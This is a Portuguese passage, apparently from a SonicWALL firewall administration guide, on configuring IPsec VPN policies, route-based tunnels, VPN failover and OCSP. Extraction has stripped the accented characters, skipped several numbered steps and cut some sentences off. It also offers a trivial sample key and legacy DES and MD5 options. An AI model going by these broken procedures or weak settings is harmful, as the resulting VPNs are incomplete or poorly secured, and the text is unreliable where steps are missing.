Etapa 1 Clique em Adicionar na pgina VPN > Configuraes. A janela Poltica de VPN exibida.
Etapa 2 Na guia Geral na janela Poltica de VPN, selecione Chave manual no menu Modo de criao
de chave IPsec. A janela Poltica de VPN exibe as opes de chave manuais.
Etapa 3 Insira um nome para a poltica no campo Nome.
Etapa 4 Insira o nome de host ou endereo IP da conexo remota no campo Nome ou endereo do
gateway de IPsec.
Etapa 6 Selecione uma rede local em Escolher rede local na lista, se uma rede local especfica puder
acessar o tnel de VPN. Se o trfego puder ser originado de qualquer rede local, selecione
Qualquer endereo. Use esta opo, se um par tiver selecionado Usar este tnel de VPN
como rota padro para todo o trfego de Internet. Apenas possvel configurar uma SA para
usar essa configurao. Como alternativa, selecione Escolher rede de destino na lista e
selecione grupo ou objeto de endereo.
Etapa 8 Defina um SPI de entrada e um SPI de sada. Os SPIs esto hexadecimais
(0123456789abcedf) e podem variar de 3 a 8 caracteres de comprimento.
Cuidado Cada associao de segurana deve ter SPIs exclusivos; duas associaes de segurana
no podem compartilhar os mesmos SPIs. No entanto, cada SPI de entrada da associao
de segurana pode ser o mesmo que o SPI de sada.
Etapa 9 Os valores padro para Protocolo, Criptografia fase 2 e Autenticao fase 2 so aceitos
para a maioria das configuraes de SA de VPN.
Nota Os valores para Protocolo, Criptografia fase 2 e Autenticao fase 2 deve

correspondncia aos valores no firewall remoto.
Etapa 10 Insira uma chave de criptografia hexadecimal de 16 caracteres no campo Chave de

criptografia ou use o valor padro. Essa chave de criptografia usada para configurar a chave
de criptografia da SonicWALL remota, portanto, grave-a para ser usada ao configurar o firewall.
Etapa 11 Insira uma chave de autenticao hexadecimal de 32 caracteres no campo Chave de
autenticao ou use o valor padro. Grave a chave a ser usada ao definir as configuraes
do firewall.

Dica Os caracteres hexadecimais vlidos incluem 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, a, b, c, d, e e f.
1234567890abcdef um exemplo de uma chave de criptografia DES ou ARCFour vlida.
Se voc inserir uma chave de criptografia incorreta, uma mensagem de erro ser exibida
na parte inferior da janela do navegador.
que deseja aplicar poltica de VPN.
Por padro, a configurao Suprimir criao automtica de regras de acesso para
poltica de VPN no habilitada para permitir que o trfego de VPN atravesse as
zonas apropriadas.
Selecione Habilitar difuso seletiva de rede do Windows (NetBIOS) para permitir o
acesso a recursos de rede remota navegando no ambiente de Rede do Windows.
Selecione Aplicar polticas de NAT, se desejar que o firewall traduza ambas as redes,
local e remota, que se comunicam por meio deste tnel de VPN. Para executar a
traduo de endereo de rede na rede local, selecione ou crie um objeto de endereo
na caixa suspensa Rede local traduzida. Para traduzir a rede remota, selecione ou
crie um objeto de endereo na caixa suspensa Rede remota traduzida. Geralmente,
se a NAT for necessria em um tnel, local ou remoto dever ser traduzido, mas no
ambos. Aplicar polticas de NAT especificamente til em casos em que ambos os
lados de um tnel usam as mesmas sub-redes ou as sub-redes sobrepostas.
Para gerenciar a SonicWALL local por meio do tnel de VPN, selecione HTTPS em
Gerenciamento por meio deste SA.
Selecione HTTP, HTTPS ou ambos em Login do usurio por meio deste SA para
permitir que os usurios efetuem login usando SA.
Se voc tiver um Endereo IP para um gateway, insira-o no campo Gateway de LAN
padro (opcional).
Selecione uma interface no menu Poltica de VPN ligada a.
Etapa 14 Clique em Aceitar na pgina VPN > Configuraes para atualizar as Polticas de VPN.
Configurando o dispositivo de segurana de rede da Dell SonicWALL remota
Etapa 1 Clique em Adicionar na pgina VPN > Configuraes. A janela Poltica de VPN exibida.
Etapa 2 Na guia Geral, selecione Chave manual no menu Modo de criao de chave de IPsec.
Etapa 3 Insira um nome para SA no campo Nome.
Etapa 4 Insira o nome de host ou endereo IP da conexo local no campo Nome ou endereo do
gateway de IPsec.
Etapa 6 Selecione uma rede local em Escolher rede local na lista, se uma rede local especfica puder
acessar o tnel de VPN. Se o trfego puder ser originado de qualquer rede local, selecione
Qualquer endereo. Selecione Usar este tnel de VPN como rota padro para todo o

que ele estiver criptografado. Apenas possvel configurar uma SA para usar essa
configurao. Como alternativa, selecione Escolher rede de destino na lista e selecione
grupo ou objeto de endereo.
Etapa 8 Defina um SPI de entrada e um SPI de sada. Os SPIs esto hexadecimais
(0123456789abcedf) e podem variar de 3 a 8 caracteres de comprimento.
Cuidado Cada associao de segurana deve ter SPIs exclusivos; duas associaes de segurana
no podem compartilhar os mesmos SPIs. No entanto, cada SPI de entrada da associao
de segurana pode ser o mesmo que o SPI de sada.
Etapa 9 Os valores padro para Protocolo, Criptografia fase 2 e Autenticao fase 2 so aceitos
para a maioria das configuraes de SA de VPN.
Nota Os valores para Protocolo, Criptografia fase 2 e Autenticao fase 2 deve

correspondncia aos valores no firewall remoto.
Etapa 10 Insira uma chave de criptografia hexadecimal de 16 caracteres no campo Chave de

criptografia ou use o valor padro. Essa chave de criptografia usada para configurar a chave
de criptografia da SonicWALL remota, portanto, grave-a para ser usada ao configurar a
SonicWALL remota.
Etapa 11 Insira uma chave de autenticao hexadecimal de 32 caracteres no campo Chave de
autenticao ou use o valor padro. Grave a chave a ser usada ao definir as configuraes
da SonicWALL remota.
Dica Os caracteres hexadecimais vlidos incluem 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, a, b, c, d, e e f.

1234567890abcdef um exemplo de uma chave de criptografia DES ou ARCFour vlida.
Se voc inserir uma chave de criptografia incorreta, uma mensagem de erro ser exibida
na parte inferior da janela do navegador.
que deseja aplicar poltica de VPN:
zonas apropriadas.
na caixa suspensa Rede local traduzida. Para traduzir a rede remota, selecione ou
crie um objeto de endereo na caixa suspensa Rede remota traduzida. Geralmente,
se a NAT for necessria em um tnel, local ou remoto dever ser traduzido, mas no
ambos. Aplicar polticas de NAT especificamente til em casos em que ambos os
lados de um tnel usam as mesmas sub-redes ou as sub-redes sobrepostas.

Nota No ser possvel usar esse recurso, se voc tiver selecionado Usar este tnel de VPN
como a rota padro para todo o trfego de Internet na guia Rede.
Para gerenciar a SonicWALL remota por meio do tnel de VPN, selecione HTTP,
HTTPS ou ambas em Gerenciamento por meio deste SA.
Selecione HTTP, HTTPS ou ambos em Login do usurio por meio deste SA para
permitir que os usurios efetuem login usando SA.
Se voc tiver um Endereo IP para um gateway, insira-o no campo Gateway de LAN
padro (opcional).
Selecione uma interface no menu Poltica de VPN ligada a.
Etapa 14 Clique em Aceitar na pgina VPN > Configuraes para atualizar as Polticas de VPN.
Dica Depois que a Rede do Windows (NetBIOS) tiver sido habilitada, os usurios podero exibir
computadores remotos em seu ambiente de Rede do Windows. Os usurios tambm
podero acessar recursos na LAN remota digitando endereos IP remotos dos servidores
ou das estaes de trabalho.
Configurando uma poltica de VPN com IKE usando um certificado de terceiros
Nota Deve-se ter um certificado vlido de uma autoridade de certificado de terceiros instalado na
SonicWALL antes de poder configurar a poltica de VPN com IKE usando um certificado de
terceiros.
Para criar uma SA de VPN usando IKE e certificados de terceiros, siga estas etapas:
Etapa 1 Na pgina VPN > Configuraes, clique em Adicionar. A janela Poltica de VPN exibida.
Etapa 2 Na lista Mtodo de autenticao na guia Geral, selecione IKE usando certificados de
terceiros. A janela Poltica de VPN exibe as opes de certificado de terceiros.
Etapa 3 Digite um Nome para a associao de segurana no campo Nome.
Etapa 4 Digite o endereo IP ou FQDN (Nome de domnio totalmente qualificado) da SonicWALL
remota primria no campo Nome ou endereo do gateway primrio de IPsec. Se voc tiver
uma SonicWALL remota secundria, insira o endereo IP ou o FQDN (nome de domnio
totalmente qualificado) no campo Nome ou endereo do gateway secundrio de IPsec.
Etapa 5 Em Autenticao de IKE, selecione um certificado de terceiros na lista Certificado local.
Voc deve ter importado certificados locais antes de selecionar esta opo.
Etapa 6 Selecione um dos seguinte tipos de ID de mesmo nvel no menu Tipo de ID de IKE de mesmo
nvel:
ID de e-mail e Nome de domnio - os tipos de ID de e-mail e Nome de domnio
baseiam-se no campo Nome alternativo do assunto do certificado, que no est
contido em todos os certificados, por padro. Se o certificado contiver um Nome
alternativo do assunto, esse valor dever ser usado. Para as VPNs site a site, os
caracteres curingas (como * para mais de 1 caractere ou ? para um nico caractere)

no podero ser usados. O valor total do ID de e-mail ou de Nome de domnio deve
ser inserido. Isso porque as VPNs site a site devem se conectar a um nico ponto,
ao contrrio das VPNs de grupo, que esperam vrios pontos para se conectarem.
Nome distinto - com base no campo Nome distinto do assunto dos certificados, que
est contido em todos os certificados, por padro. Conforme ocorre com o ID de e-mail
e o Nome de domnio acima, todo o campo Nome distinto deve ser inserido para os
caracteres curingas de VPNs site a site que no so suportados.
O formato de qualquer Nome distinto do assunto determinado pela autoridade
emissora de certificado. Os campos comuns so Pas (C=), organizao (O=), unidade
organizacional (UO=), nome comum (CN=), localidade (L=) e variam de acordo com a
autoridade emissora de certificado. O campo Nome distinto do assunto real em um
certificado X.509 um objeto binrio que deve ser convertido em uma cadeia de
caracteres para fins de correspondncia. Os campos so separados pelo caractere de
barra invertida, por exemplo: /C=US/O=SonicWALL, Inc./OU=TechPubs/CN=Joe
Pub
Para localizar os detalhes de certificado (Nome alternativo do assunto, Nome distinto,
etc.), navegue at a pgina Sistema > Certificados e clique no boto Exportar
para o certificado.
Etapa 7 Digite uma sequncia de caracteres de ID no campo ID de IKE de mesmo nvel.
Etapa 9 Em Redes locais, selecione uma rede local em Escolher rede local na lista, se uma rede
local especfica puder acessar o tnel de VPN. Se os hosts neste lado da conexo de VPN
estiverem obtendo seu endereamento de um servidor DHCP no lado do tnel remoto,
selecione Rede local obtm endereos IP usando DHCP por meio deste tnel de VPN. Se
o trfego puder ser originado de qualquer rede local, selecione Qualquer endereo.
Etapa 10 Em Redes de destino, selecione Usar este tnel de VPN como rota padro para todo o
que ele esteja criptografado. Apenas possvel configurar uma SA para usar essa
configurao. Se o lado remoto desta conexo de VPN dever obter seu endereamento de um
servidor DHCP neste lado do tnel, selecione Rede de destino obtm endereos IP usando
o servidor DHCP por meio desse tnel. Como alternativa, selecione Escolher rede de
destino na lista e selecione grupo ou objeto de endereo.
Etapa 12 Na seo Proposta de IKE (fase 1), selecione as configuraes a seguir:
Selecione Modo principal ou Modo agressivo no menu Troca.
Selecione o Grupo DH desejado no menu Grupo DH.
Selecione 3DES, AES-128, AES-192 ou AES-256 no menu Criptografia.
Selecione 3DES, AES-128, AES-192 ou AES-256 no menu Criptografia.

Etapa 14 Clique na guia Avanado. Selecione as opes de configurao opcional que deseja aplicar
poltica de VPN:
Selecione Habilitar keep alive para usar mensagens de pulsao entre pares neste
tnel de VPN. Se uma extremidade do tnel falhar, o uso de Keepalives permitir a
renegociao automtica do tnel, uma vez que os lados ficarem disponveis
novamente sem precisar aguardar a durao proposta para serem expirados.
zonas apropriadas.
Para exigir a autenticao XAUTH pelos usurios antes de permitir que o trfego
atravesse este tnel, selecione Exigir a autenticao de cliente VPN por XAUTH e
selecione um grupo de usurios para especificar os usurios permitidos no Grupo de
usurios para XAUTH.
Selecione Habilitar difuso seletiva para permitir o trfego de difuso seletiva por
corresponde esta poltica ao dispositivo WAN Acceleration (WXA)
no menu Rede local traduzida. Para traduzir a rede remota, selecione ou crie um
objeto de endereo no menu Rede remota traduzida. Geralmente, se a NAT for
necessria em um tnel, local ou remoto dever ser traduzido, mas no ambos.
Aplicar polticas de NAT especificamente til em casos em que ambos os lados de
um tnel usam as mesmas sub-redes ou as sub-redes sobrepostas.
Selecione Habilitar verificao de OCSP para verificar o status do certificado de VPN
e especifique a URL na qual verificar o status do certificado. Consulte Usando o OCSP
com dispositivos de segurana de rede da Dell SonicWALL na pgina 868 em .
Para gerenciar a SonicWALL remota por meio do tnel de VPN, selecione HTTP,
HTTPS ou ambas em Gerenciamento por meio deste SA. Selecione HTTP, HTTPS
ou ambos no login do usurio por meio deste SA para permitir que os usurios efetuem
login usando SA.
Se desejar usar um roteador na LAN para trfego inserindo este tnel destinado a uma
sub-rede desconhecida, por exemplo, se voc tiver configurado o outro lado como
Usar este tnel de VPN como rota padro para todo o trfego de Internet, dever
inserir o endereo IP do roteador no campo Gateway de LAN padro (opcional).
Selecione uma interface ou zona no menu Poltica de VPN ligada a. Uma zona ser
a seleo preferencial, se voc estiver usando o balanceamento de carga de WAN e
desejar permitir que a VPN use qualquer interface de WAN.
Por padro, em Configuraes IKEv2 (visvel apenas se voc tiver selecionado IKEv2
para Troca na guia Propostas), a caixa de seleo No enviar pacote de
acionamento durante a negociao SA de IKE estar desmarcada e dever ser
selecionada apenas quando necessrio para fins de interoperabilidade.

O termo pacote de acionamento refere-se ao uso de cargas iniciais de seletor de
trfego preenchidas com os endereos IP do pacote que fez com que a negociao SA
iniciasse. prtica recomendvel incluir pacotes de acionamento para ajudar o
Respondente de IKEv2 na seleo dos intervalos corretos do endereo IP protegido de
seu Banco de dados de poltica de segurana. Nem todas as implementaes
oferecem suporte esse recurso, portanto, pode ser apropriado desabilitar a incluso
de pacotes de acionamento para alguns IKE de mesmo nvel.
Selecione uma ou as duas opes a seguir para a poltica de VPN de IKEv2:
Aceitar tipo de certificado de Hash e URL
Enviar tipo de certificado URL e Hash
Selecione essas opes, se os dispositivos puderem enviar e processar URLs de
hash e de certificado, em vez dos prprios certificados. Usar as seguintes opes
reduz o tamanho das mensagens trocadas.
Quando a opo Aceitar tipo de certificado de Hash e URL estiver selecionada,
o firewall enviar uma mensagem HTTP_CERT_LOOKUP_SUPPORTED ao
dispositivo de mesmo nvel. Se o dispositivo de mesmo nvel responder, enviando
um certificado "Hash e URL de X.509c", o firewall poder autenticar e estabelecer
um tnel entre os dois dispositivos.
Quando a opo Enviar tipo de certificado de Hash e URL estiver selecionada,
o firewall, ao receber uma mensagem de HTTP_CERT_LOOKUP_SUPPORTED,
enviar um certificado "Hash e URL de X.509c" ao solicitante.
Em uma VPN, os dois firewalls de mesmo nvel (FW1 e FW2) negociam um tnel.
Na perspectiva de FW1, FW2 o gateway remoto e vice-versa.
Configurando failover de VPN para uma rota esttica

Opcionalmente, possvel configurar uma rota esttica para ser usada como uma rota
secundria, no caso do tnel de VPN ficar inativo. A opo Permitir que o caminho de VPN
tenha precedncia permite criar uma rota secundria de um tnel de VPN. Por padro, as
rotas estticas tm uma mtrica de um e precedncia sobre o trfego de VPN. A opo
Permitir que o caminho VPN tenha precedncia proporciona precedncia sobre a rota para
o trfego de VPN para o mesmo objeto de endereo de destino. Isso resulta no seguinte
comportamento:
Quando um tnel de VPN estiver ativo: as rotas estticas que correspondem ao objeto de
endereo de destino do tnel de VPN sero desativadas automaticamente, se a opo
Permitir que o caminho VPN tenha precedncia estiver ativada. Todo o trfego
roteado no tnel de VPN para o objeto de endereo de destino.
Quando um tnel de VPN ficar inativo: o objeto de endereo de destino do tnel VPN de
correspondncia de rotas estticas ser habilitado automaticamente. Todo o trfego para
o objeto de endereo de destino roteado nas rotas estticas.
Para configurar uma rota esttica como um failover de VPN, conclua as seguintes etapas:

Etapa 1 Navegue at a pgina Rede > Roteamento.
Etapa 2 Role at a parte inferior da pgina e clique no boto Adicionar. A janela Adicionar poltica
de rota exibida.
Etapa 3 Selecione a Origem, Destino, Servio, Gateway e Interface apropriada.
Etapa 4 Deixe o mtrica como 1.
Etapa 5 Habilite a caixa de seleo Permitir que o caminho VPN tenha precedncia.
Para obter mais informaes sobre como configurar rotas estticas e Roteamento baseado em
poltica, consulte Rede > Roteamento na pgina 301.
VPN baseado em Rota

Uma abordagem baseada em polticas fora a configurao de polticas de VPN a incluir a
configurao de topologia de rede. Isso dificulta ao administrador de rede configurar e manter
a poltica de VPN com uma topologia de rede em constante mudana.
Com a abordagem de VPN baseada em Rota, a configurao de topologia de rede removida
da configurao de poltica de VPN. A configurao de poltica de VPN cria uma Interface de
tnel entre dois pontos de terminal. As rotas esttica ou dinmica podem ser adicionadas na
Interface de tnel. A abordagem de VPN baseada em Rota move a configurao de rede da
configurao de poltica de VPN para a configurao de Rota esttica ou dinmica.
No apenas a VPN baseada em Rota torna a configurao e a manuteno da poltica de VPN
mais fcil, uma grande vantagem do recurso da VPN baseada em Rota que ela fornece
flexibilidade em como o trfego roteado. Com esse recurso, os usurios agora podem definir
vrios caminhos para as redes sobrepostas em uma VPN de limpeza ou redundante.
Usando a VPN baseada em Rota

A configurao de VPN baseada em Rota um processo de duas etapas. A primeira etapa
envolve a criao de uma Interface de tnel. Os conjuntos de criptografia usados para proteger
o trfego entre dois pontos de terminal so definidos na Interface de tnel. A segunda etapa
envolve a criao de uma rota esttica ou dinmica usando a Interface de tnel.
A Interface de tnel ser criada quando uma Poltica de tipo "Interface de tnel" for adicionada
para o gateway remoto. A Interface de tnel deve ser associada a uma interface fsica e o
endereo IP da interface fsica usado como endereo de origem do pacote no tnel.
Adicionando uma Interface de tnel

Os procedimentos a seguir explicam como adicionar uma Interface de tnel:

Etapa 1 Navegue at VPN>Configuraes>Polticas de VPN. Clique no boto Adicionar. Isso abrir
a caixa de dilogo Configurao de Poltica de VPN.
Etapa 2 Na guia Geral, selecione o tipo de poltica como "Interface de tnel."
Etapa 3 Em seguida, navegue at a guia Proposta e configure as propostas IKE e IPSec para a
negociao de tnel.
Etapa 4 Navegue at a guia Avanado para configurar as propriedades avanadas para a Interface de
tnel. Por padro, Habilitar keep alive est habilitado. Isso para estabelecer o tnel com o
gateway remoto de forma proativa.
Etapa 5 As outras opes avanadas a seguir podem ser configuradas:
Permitir roteamento avanado - adiciona essa Interface de tnel na lista de
interfaces na tabela de Roteamento avanado na pgina Rede > Roteamento.
Tornando essa uma configurao opcional, isso evita a adio de todas as Interfaces
de tnel para a tabela de Roteamento avanado, que ajuda a simplificar a configurao
de roteamento. Consulte Configurar roteamento avanado para interfaces de tnel na
pgina 317 para obter informaes sobre como configurar o roteamento avanado RIP
ou OSPF para a Interface de tnel.
Habilitar o modo de transporte - fora a negociao de IPsec a usar o Modo de
transporte, em vez de Modo de tnel. Isso foi introduzido para compatibilidade com
Nortel. Quando essa opo for habilitada no firewall local, ela DEVER ser habilitada
no firewall remoto tambm, para que a negociao seja bem-sucedida.
Solicitar autenticao de clientes VPN por XAUTH - requer que todo o trfego de
entrada neste tnel de VPN seja de um usurio autenticado.
Grupo de usurios para usurios XAUTH - especifica o grupo de usurios que tero
acesso a essa VPN, se XAUTH for selecionado
Habilitar difuso seletiva de rede do Windows (NetBIOS) - permite o acesso a
Habilitar difuso seletiva - permite que o trfego de difuso seletiva por meio do tnel
de VPN.
Gerenciamento por meio deste SA - permite que os usurios remotos efetuem login
para gerenciar o firewall por meio do tnel de VPN.
Login de usurio por muio deste SA - permite que os usurios efetuem login usando
SA.
Poltica de VPN ligada a - define a interface qual a Interface de tnel est ligada.
Essa x1, por padro.
Criando uma rota esttica para a Interface de tnel

Aps ter adicionado com xito uma Interface de tnel, poder criar uma Rota esttica. Siga os
procedimentos para criar uma Rota esttica para uma Interface de tnel:
Navegue at Rede>Roteamento>Polticas de rota. Clique no boto Adicionar. Uma janela
de caixa de dilogo exibida para a adio de Rota esttica. Observe que o menu suspenso
"Interface" lista todas as interfaces de tnel disponveis.
Nota Se a opo "Adicionar automaticamente a regra de acesso" estiver selecionada, as regras

de firewall sero adicionadas automaticamente e o trfego ser permitido entre as redes
configuradas usando a interface de tnel.

Entradas de rota para diferentes segmentos de rede
Aps a criao de uma interface de tnel, vrias entradas de rota podero ser configuradas
para usar a mesma interface de tnel para diferentes redes. Isso fornece um mecanismo para
modificar a topologia de rede sem fazer alteraes na interface de tnel.
Rotas estticas redundantes para uma rede

Aps a configurao de mais de uma interface de tnel, ser possvel adicionar mltiplas rotas
estticas sobrepostas; cada rota esttica usa uma interface de tnel diferente para rotear o
trfego. Isso fornece redundncia de roteamento para que o trfego alcance o destino.
Interface de tnel solta

A interface de tnel solta uma interface de tnel pr-configurada. Essa interface fornece
segurana adicional para o trfego. Um exemplo disso seria se uma interface de ligao de
rota esttica fosse considerada a interface de tnel solta e todos os trfegos para essa rota
fossem descartados e no encaminhados para limpeza. Se uma ligao de rota esttica para
a interface de tnel estiver definida para o trfego (origem/destino/servio) e for desejado que
o trfego no dever ser encaminhado para a limpeza se a a interface de tnel estiver inativa,
ser recomendvel configurar uma ligao de rota esttica para a interface de tnel solta para
o mesmo trfego de rede. Como um resultado, se a interface de tnel estiver inativa, o trfego
ser descartado devido rota esttica da interface de tnel solta.
Criando uma rota esttica para a Interface de tnel solta

Para adicionar uma rota esttica para a interface de tnel solta, navegue at Rede >
Roteamento > Polticas de roteamento. Clique no boto Adicionar. Semelhante
configurao de uma rota esttica para uma interface de tnel, configure os valores para
Objetos de servio, Origem e Destino. Em Interface, selecione "Drop_tunnelIf".

Uma vez adicionada, a rota ser habilitada e exibida nas Polticas de rota.
Controle de regra de acesso VPN adicionada automaticamente

Ao adicionar Polticas de VPN, o SonicOS cria automaticamente regras de acesso no
editveis para permitir que o trfego atravesse as zonas apropriadas. Considere a seguinte
Poltica de VPN, na qual a Rede local definida como Sub-redes com firewall (neste caso,
compreende a LAN e a DMZ) e a Rede de destino definida como Sub-rede 192.168.169.0.
Embora, geralmente isso seja uma enorme convenincia, h algumas instncias nas quais
possvel ser prefervel suprimir a criao automtica de Regras de acesso para dar suporte a
uma Poltica de VPN. Um exemplo seria o caso de uma grande implantao de VPN de hub e
spoke em que todos os sites de spoke so endereos que usam espaos de endereos que
podem ser facilmente ser agrupados em sub-rede. Por exemplo, suponha que desejamos
fornecer acesso de/para a LAN e DMZ no site de hub para uma sub-rede em cada um dos
2.000 sites remotos, tratados da seguinte maneira:
remoteSubnet0=Network 10.0.0.0/24 (mscara 255.255.255.0, intervalo 10.0.0.0-
10.0.0.255)
10.0.1.255)
10.0.2.255)
remoteSubnet2000=10.7.207.0/24 (mscara 255.255.255.0, intervalo 10.7.207.0-
10.7.207.255)
Criar Polticas de VPN para cada um desses sites remotos resultar em 2.000 requisitos de
Polticas de VPN, mas tambm criar 8.000 regras de acesso (LAN -> VPN, DMZ -> VPN, VPN
-> LAN e VPN -> DMZ para cada site). No entanto, todas essas Regras de acesso sero

facilmente tratadas com apenas quatro Regras de acesso para uma representao de intervalo
de endereos ou agrupada em sub-rede dos sites remotos (permitir ou negar Regras de acesso
mais especficas pode ser adicionado, conforme necessrio):
remoteSubnetAll=Network 10.0.0.0/13 (mscara 255.248.0.0, intervalo 10.0.0.0-
10.7.255.255) ou
remoteRangeAll=Range 10.0.0.0-10.7.207.255
Para habilitar esse nvel de agregao, a guia Avanado da pgina de janela Poltica de VPN
oferece a opo para a configurao Adicionar automaticamente regras de acesso para
Poltica de VPN. Por padro, a caixa de seleo marcada, o que significa que as Regras de
acesso que a acompanham sero criadas automaticamente, como elas sempre foram.
Desmarcando a caixa de seleo na criao da Poltica de VPN, o administrador ter a
capacidade e a necessidade de criar Regras de acesso personalizadas para trfego de VPN.

Captulo 54
Definindo configuraes avanadas de
VPN
VPN > Avanado

A pgina VPN > Avanado inclui Configuraes avanadas de VPN que afetam todas as
polticas de VPN de forma global. Esta seo tambm fornece solues do OCSP (Online
Certificate Status Protocol). O OCSP permite verificar o status do certificado de VPN sem as
CRLs (listas de revogao de certificados). Isso permite atualizaes em tempo hbil com
relao ao status dos certificados usados no firewall.
Esta seo contm as seguintes sees:

Definindo configuraes avanadas de VPN na pgina 866
Usando o OCSP com dispositivos de segurana de rede da Dell SonicWALL na pgina 868
Definindo configuraes avanadas de VPN | 865

Definindo configuraes avanadas de VPN
A pgina VPN > Avanado apresenta dois painis com opes que podem ser habilitadas:
Configuraes avanadas deVPN na pgina 866
Configuraes de IKEv2 na pgina 867
Configuraes avanadas deVPN

Habilitar deteco de mesmo nvel de IKE inativo - Selecione se desejar que os tneis
de VPN inativos sejam descartados pelo firewall.
Intervalo de deteco de mesmo nvel inativo - digite o nmero de segundos entre
as "pulsaes." O valor padro 60 segundos.
Nvel de acionador de falha (pulsaes perdidas) - insira o nmero de pulsaes
perdidas. O valor padro 3. Se o nvel de acionador for atingido, a conexo de VPN
ser descartada pelo firewall. O firewall usa um pacote UDP protegido por criptografia
de fase 1 como a pulsao.
Habilitar deteco de mesmo nvel inativo para sesses inativas de VPN -
selecione esta configurao se desejar que as conexes inativas de VPN sejam
descartadas pelo firewall aps o valor de tempo ter sido definido no campo Intervalo
de deteco de mesmo nvel inativo para sesses inativas de VPN (segundos). O
valor padro 600 segundos (10 minutos).
Habilitar manipulao de pacote fragmentado - Se o relatrio de registro de VPN
mostrar a mensagem de log "Pacote IPsec fragmentado descartado", selecione esse
recurso. No o selecione at que o tnel VPN esteja estabelecido e em funcionamento.
Ignorar bit DF (No fragmentar) - Marque esta caixa de seleo para ignorar o bit DF
no cabealho do pacote. Alguns aplicativos podem definir explicitamente a opo 'No
fragmentar' em um pacote, o que faz com que todos os dispositivos de segurana no
fragmentem o pacote. Quando habilitada, essa opo faz com que o firewall ignore a
opo e fragmente o pacote independentemente.
Habilitar NAT transversal - selecione esta configurao se um dispositivo NAT estiver
localizado entre os pontos terminais de VPN. Os VPNs IPsec protegem o trfego trocado
entre os pontos terminais autenticados, mas os pontos terminais autenticados no podem
ser remapeados dinamicamente no meio da sesso para o NAT transversal funcionar.
Portanto, para preservar uma ligao NAT dinmica para a durao de uma sesso IPsec,
um UDP de 1 byte designado como um "NAT transversal keepalive" e age como uma
"pulsao" enviada pelo dispositivo de VPN por trs do dispositivo NAT ou NAPT. O
"keepalive" descartado silenciosamente pelo IPsec de mesmo nvel.
Limpar tneis ativos quando o nome DNS do gateway de mesmo nvel for resolvido
para um endereo IP diferente - quebra os SAs associados aos endereos IP antigos e
reconecta ao gateway de mesmo nvel.
Habilitar verificao de OCSP e URL do respondente OCSP - permite o uso do OCSP
(Online Certificate Status Protocol) para verificar o status do certificado VPN e especifica
a URL na qual verificar o status do certificado. Consulte Usando o OCSP com dispositivos
de segurana de rede da Dell SonicWALL na pgina 868.
Enviar capturas de tnel de VPN somente quando o status do tnel for alterado
Reduz o nmero de capturas de tnel de VPN enviadas somente pelas capturas de envio
quando o status do tnel for alterado.
Usar RADIUS em - ao usar o RADIUS para autenticar usurios de cliente de VPN, o
RADIUS ser usado em seu modo MSCHAP (ou MSCHAPv2). O principal motivo para
escolher fazer isso seria para que os usurios de cliente de VPN pudessem fazer uso do
recurso MSCHAP que os permitissem alterar senhas expiradas no momento de login.

Tambm, se isso estiver definido e o LDAP for selecionado como o Mtodo de
autenticao para efetuar login na pgina Usurios > Configuraes, mas o LDAP no
est configurado de forma a permitir as atualizaes de senha e, as atualizaes de senha
para usurios de cliente de VPN so feitas usando o RADIUS no modo MSCHAP aps usar
o LDAP para autenticar o usurio.
Nota As atualizaes de senha apenas podero ser feitas por LDAP ao usar o Active
Directory com TLS e se ligando a ele usando uma conta administrativa ou ao usar
o Novell eDirectory.
Configuraes de IKEv2
Enviar notificao de cookie IKEv2 - envia cookies para IKEv2 do mesmo nvel como
uma ferramenta de autenticao.
Proposta de cliente dinmico IKEv2 - O SonicOS fornece suporte ao cliente dinmico
IKEv2 que fornece uma maneira de configurar os atributos do IKE (Internet Key Exchange),
em vez de usar as configuraes padro. Clicar no boto Configurar ativa a janela
Configurar proposta de cliente dinmico IKEv2.
Anteriormente, apenas as configuraes padro eram suportadas: Grupo Diffie-Hellman

(DH) 2, o algoritmo de criptografia 3DES e o mtodo de autenticao SHA1. Agora, o
SonicOS permite as seguintes configuraes de proposta IKE:
Grupo DH: 1, 2, 5 ou 14
Criptografia: DES, 3DES, AES-128, AES-192, AES-256
Autenticao: MD5, SHA1
No entanto, se uma Poltica de VPN com o modo de troca IKEv2 e um gateway IPSec
0.0.0.0 for definido, no ser possvel definir essas configuraes de proposta IKE em uma
base de poltica individual.
Nota A poltica de VPN no gateway remoto tambm deve ser definida com as mesmas
configuraes.

Usando o OCSP com dispositivos de segurana de rede da Dell
SonicWALL
O OCSP foi projetado para aumentar ou substituir a CRL no sistema de PKI (infraestrutura de
chave pblica) ou de certificado digital. A CRL usada para validar os certificados digitais
compostos pela PKI. Isso permite que a autoridade de certificado (CA) revogue os certificados
antes de sua data de expirao programada e til para proteger o sistema PKI contra
certificados invlidos ou roubados.
A principal desvantagem de listas de revogao de certificado a necessidade de atualizaes
frequentes para manter a CRL de cada cliente atual. Essas atualizaes frequentes
aumentaro significativamente o trfego da rede quando a CRL for transferida por download
por cada cliente. Dependendo da frequncia das atualizaes de CRL, um perodo de tempo
poder existir quando um certificado for revogado pela CRL, mas o cliente no receber a
atualizao de CRL e permitir que o certificado seja usado.
O Online Certificate Status Protocol determina o status atual de um certificado digital sem usar
uma CRL. O OCSP permite que o cliente ou o aplicativo determine diretamente o status de um
certificado digital identificado. Isso fornece mais informaes atualizadas sobre o certificado
do que possvel com as CRLs. Alm disso, cada cliente, normalmente, apenas verifica alguns
certificados e no incorrem na sobrecarga de download de uma CRL inteira para apenas
algumas entradas. Isso reduz consideravelmente o trfego de rede associado validao de
certificado.
O OCSP transporta mensagens no HTTP para compatibilidade mxima com redes existentes.
Isso requer configurao cuidadosa de todos os servidores de armazenamento em cache na
rede para evitar o recebimento de uma cpia em cache de uma resposta de OCSP que pode
estar desatualizada.
O cliente OCSP se comunica com um respondente do OCSP. O respondente do OCSP pode
ser um servidor de autoridade de certificao ou outro servidor que se comunica com o servidor
de autoridade de certificao para determinar o status do certificado. O cliente do OCSP
emitir uma solicitao de status para um respondente do OCSP e suspender a aceitao do
certificado at que o respondente fornea uma resposta. A solicitao do cliente inclui dados
como verso de protocolo, solicitao de servio, identificao do certificado de destino e
extenses opcionais. Essas extenses opcionais podem ser ou no reconhecidas pelo
respondente do OCSP.
O respondente do OCSP recebe a solicitao do cliente e verifica se a mensagem est
formada corretamente e se o respondente capaz de responder solicitao de servio. Em
seguida, ele verifica se a solicitao contm as informaes corretas necessrias para o
servio desejado. Se todas as condies forem atendidas, o respondente retornar uma
resposta definitiva para o cliente do OCSP. O respondente do OCSP necessrio para
